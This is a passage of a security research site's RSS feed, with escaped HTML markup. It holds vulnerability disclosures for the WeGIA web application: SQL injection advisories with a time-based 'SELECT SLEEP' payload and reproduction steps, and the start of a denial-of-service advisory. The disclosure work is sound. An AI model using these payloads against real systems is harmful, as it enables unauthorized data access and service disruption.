	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53527</title>
        <link>https://www.cvehunters.com/p/cve-2025-53527/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53527/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53527-sql-injection-vulnerability-in-tipo-and-responsavel-parameters-on-relatorio_geracaophp-endpoint&amp;#34;&amp;gt;CVE-2025-53527: SQL Injection Vulnerability in &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; Parameters on &amp;lt;code&amp;gt;relatorio_geracao.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; parameters of the &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;846&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53527-sql-injection-vulnerability-in-tipo-and-responsavel-parameters-on-relatorio_geracaophp-endpoint&amp;#34;&amp;gt;CVE-2025-53527: SQL Injection Vulnerability in &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; Parameters on &amp;lt;code&amp;gt;relatorio_geracao.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; parameters of the &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;846&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sql-injection-parameter-tipo&amp;#34;&amp;gt;SQL Injection parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  ;SELECT SLEEP(10)#
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image-1.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;844&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image-1_hu_c53ce822599b86e2.png 480w, /p/cve-2025-53527/image-1_hu_d3264b015af14a6d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;503px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sql-injection-parameter-responsavel&amp;#34;&amp;gt;SQL Injection parameter &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;payload-1&amp;#34;&amp;gt;Payload:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  ;SELECT SLEEP(10)#
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image-2.png&amp;#34;
	width=&amp;#34;1771&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image-2_hu_44bcaa97ca684007.png 480w, /p/cve-2025-53527/image-2_hu_5c23286a79e2c0ab.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;208&amp;#34;
		data-flex-basis=&amp;#34;501px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53529</title>
        <link>https://www.cvehunters.com/p/cve-2025-53529/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53529/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53529-sql-injection-vulnerability-in-id_funcionario-parameter-on-profile_funcionariophp-endpoint&amp;#34;&amp;gt;CVE-2025-53529: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_funcionario.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53529-sql-injection-vulnerability-in-id_funcionario-parameter-on-profile_funcionariophp-endpoint&amp;#34;&amp;gt;CVE-2025-53529: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_funcionario.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Navigate to: &amp;lt;a href=&amp;#34;https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1&amp;lt;/a&amp;gt;;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Insert SQL command after &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter like in the image below:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53529/image.png&amp;#34;
	width=&amp;#34;1912&amp;#34;
	height=&amp;#34;1073&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53529/image_hu_32a2f42d1fd543dd.png 480w, /p/cve-2025-53529/image_hu_e2f18ef0e93db18f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;178&amp;#34;
		data-flex-basis=&amp;#34;427px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the Fatal error: &amp;lt;code&amp;gt;Uncaught PDOException: SQLSTATE[HY000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns&amp;lt;/code&amp;gt; message, unequivocally confirming SQL Injection.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/pedro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Pedro Lyrio&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53530</title>
        <link>https://www.cvehunters.com/p/cve-2025-53530/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53530/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53530-uncontrolled-resource-consumption-in-wegia-parameter-errorstr&amp;#34;&amp;gt;CVE-2025-53530: Uncontrolled Resource Consumption in WeGIA parameter &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53530-uncontrolled-resource-consumption-in-wegia-parameter-errorstr&amp;#34;&amp;gt;CVE-2025-53530: Uncontrolled Resource Consumption in WeGIA parameter &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET https://comfirewall.wegia.org:8000/WeGIA?errorstr=AAAA...&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The parameter &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; in the URL allows attackers to add an arbitrary amount of data up to &amp;lt;b&amp;gt;8,142 characters.&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;There is no validation for the length of the &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; parameter processed by the server.&amp;lt;/li&amp;gt;
